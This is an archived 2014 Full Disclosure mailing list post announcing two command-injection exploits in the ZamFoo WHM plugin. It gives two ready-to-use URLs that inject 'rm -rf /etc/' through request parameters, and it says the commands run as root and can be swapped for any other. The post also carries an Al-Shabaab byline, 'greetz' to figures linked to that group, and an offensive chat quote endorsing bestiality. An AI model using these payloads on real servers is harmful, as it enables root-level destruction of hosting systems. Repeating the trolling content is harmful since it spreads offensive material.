[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Zamfoo Multiple Arbitrary Command Executions

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] Zamfoo Multiple Arbitrary Command Executions
From: Mad Hax <madhax@xxxxxxx>
Date: Sat, 03 May 2014 03:57:47 +0400

 # Title: Zamfoo Multiple Arbitrary Command Executions
# Author: Al-Shabaab 
# Vendor Homepage: http://www.zamfoo.com/
# Version: 12.6

# Intro

The ZamFoo software suite is a series of WHM plugin modules (also known as WHM 
addon modules) catered towards easing the burden of web hosting providers that 
sell shared hosting solutions using the Cpanel and WHM hosting platform.

# Exploit Número Uno

https://whm:2087/cpsessXXXXXXXXXX/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm
 -rf /etc/${IFS}

# Exploit Número Dos

https://whm:2087/cpsessXXXXXXXXXX/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm
 -rf /etc/|&newip=127.0.0.1&pattern2=

Both of these exploitz will wipe out the /etc/ dir. Replace command with 
anything. It all runz as root! 

# Greetz

Moktar Zubeyr. Hassan Aweys. Hassan Afrah. HoodedCoder.

# Quote from #Al-Shabaab

<hoodedcoder> Having sex with animals should be legal. I know my cat loves me 
and I love him; I ask where is the harm? If it wasn't consensual he would claw 
me and try to get away!

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Follow-Ups:
- Re: [FD] Zamfoo Multiple Arbitrary Command Executions
  - From: nkukard+fulldisclosure

Prev by Date: Re: [FD] Ruby OpenSSL private key spoofing ~ CVE-2014-2734 with PoC
Next by Date: [FD] Multiple vulnerabilities in Flexolio for WordPress
Previous by thread: Re: [FD] Ruby OpenSSL private key spoofing ~ CVE-2014-2734 with PoC
Next by thread: Re: [FD] Zamfoo Multiple Arbitrary Command Executions
Index(es):
- Date
- Thread